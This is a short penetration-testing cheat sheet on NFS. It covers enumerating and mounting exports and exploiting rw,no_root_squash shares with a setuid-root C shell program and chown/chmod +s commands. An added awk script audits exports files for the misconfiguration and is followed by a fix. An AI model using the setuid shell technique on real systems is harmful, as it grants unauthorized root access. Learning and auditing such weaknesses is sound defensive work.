NFS

----------------------------------------------------------------------------------------------------------------

Show exports and mounts
>>> showmount -e $IP
>>> showmount -a $IP
>>> nmap -sV --script=nfs-showmount $IP


Mount an NFS share
>>> mount $IP:/vol/share /mnt/nfs


→ Demo:
root@Offsec:~$ mkdir home
root@Offsec:~$ sudo mount -o nolock $IP:/home ~/home/
root@Offsec:~$ cd home/ && ls



----------------------------------------------------------------------------------------------------------------

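Some exploitation can happen here:

NOTE: ...and check if 'rw,no_root_squash' is present. With no_root_squash the server does not remap a client's UID 0 to the anonymous user, so root on a client acts as root on the exported files. If it is present, compile the below sid-shell.c: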


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setgid(), setuid() */

int main(void)
{
    /* Take the root group and user IDs, then start a shell. */
    setgid(0); setuid(0); system("/bin/bash");
    return 0;
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

...upload it to the share and execute the below to launch sid-shell to spawn a root shell:

>>> chown root:root sid-shell; chmod +s sid-shell; ./sid-shell
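
The same 'rw,no_root_squash' check, scripted from the server side. This is an added example, not part of the original notes: the function name audit_exports and the sample exports text are constructed here, and it assumes exports(5) syntax without quoted paths.

```shell
#!/bin/sh
# Added example: flag exports(5) entries that disable root squashing.
# Assumptions: no quoted paths with spaces; all_squash/anonuid are not modelled.
audit_exports() {   # exports text on stdin, one finding per line on stdout
    awk '
    {
        sub(/#.*/, "")                                  # drop comments
        if (sub(/\\[ \t]*$/, "")) { buf = buf $0 " "; next }   # join continued lines
        $0 = buf $0; buf = ""
        if (NF < 2) next
        defaults = ""
        for (i = 2; i <= NF; i++) {
            # "-opt,opt" sets default options for the clients that follow it
            if ($i ~ /^-/) { defaults = substr($i, 2); continue }
            client = $i; opts = ""
            p = index($i, "(")
            if (p > 0) {
                client = substr($i, 1, p - 1)
                opts = substr($i, p + 1)
                sub(/\).*$/, "", opts)
            }
            if (client == "") client = "*"      # bare "(opts)" applies to every host
            rw = 0; noroot = 0                  # defaults: ro, root_squash
            n = split(defaults "," opts, o, ",")
            for (j = 1; j <= n; j++) {          # later options override earlier ones
                if (o[j] == "rw") rw = 1
                else if (o[j] == "ro") rw = 0
                else if (o[j] == "no_root_squash") noroot = 1
                else if (o[j] == "root_squash") noroot = 0
            }
            sev = rw ? "HIGH" : "WARN"          # rw + no_root_squash is the case in the note
            if (noroot) print sev, $1, client
        }
    }'
}

# Constructed sample input, not taken from a real host.
SAMPLE_EXPORTS='/home        *(rw,no_root_squash)
/srv/backup  10.0.0.5(ro,no_root_squash) 10.0.0.6(rw,sync)
/data -rw,no_root_squash \
      build01 build02(root_squash)
/pub         (ro)   # read-only, squashed: not reported'

printf '%s\n' "$SAMPLE_EXPORTS" | audit_exports
```

A reported entry is fixed by removing no_root_squash (root_squash is the default) and re-exporting with exportfs -ra.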
----------------------------------------------------------------------------------------------------------------

